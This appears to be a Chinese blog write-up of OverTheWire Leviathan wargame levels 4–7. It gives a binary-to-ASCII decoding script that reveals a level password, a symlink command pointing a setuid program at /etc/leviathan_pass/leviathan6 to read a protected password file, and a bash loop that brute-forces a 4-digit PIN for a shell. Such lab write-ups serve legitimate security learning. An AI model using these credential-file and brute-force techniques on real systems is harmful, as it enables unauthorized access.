首页 > 代码库 > Leviathan系列4-7
Leviathan系列4-7
level 4:二进制转ascii,python脚本
.trash/bin #出现一串二进制
import sys
a = "01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010"
for i in a.split(‘ ‘):
sys.stdout.write(chr(int(i,2)))
level 5:符号链接,ln命令
./leviathan5 #提示Cannot find /tmp/file.log
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
./leviathan5
level 6:brute-forcing
#题目要求带4-digital为参数运行程序,如果密码正确,会给出shell。
#有点类似bandit24,新增加的那个,但更简单一些。
#!/bin/bash
for i in {0000..9999}
do
~/leviathan6 $i
done
level 7:touch the end now
本文出自 “万物皆刍狗” 博客,请务必保留此出处http://cugou.blog.51cto.com/9637775/1582675
Leviathan系列4-7
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。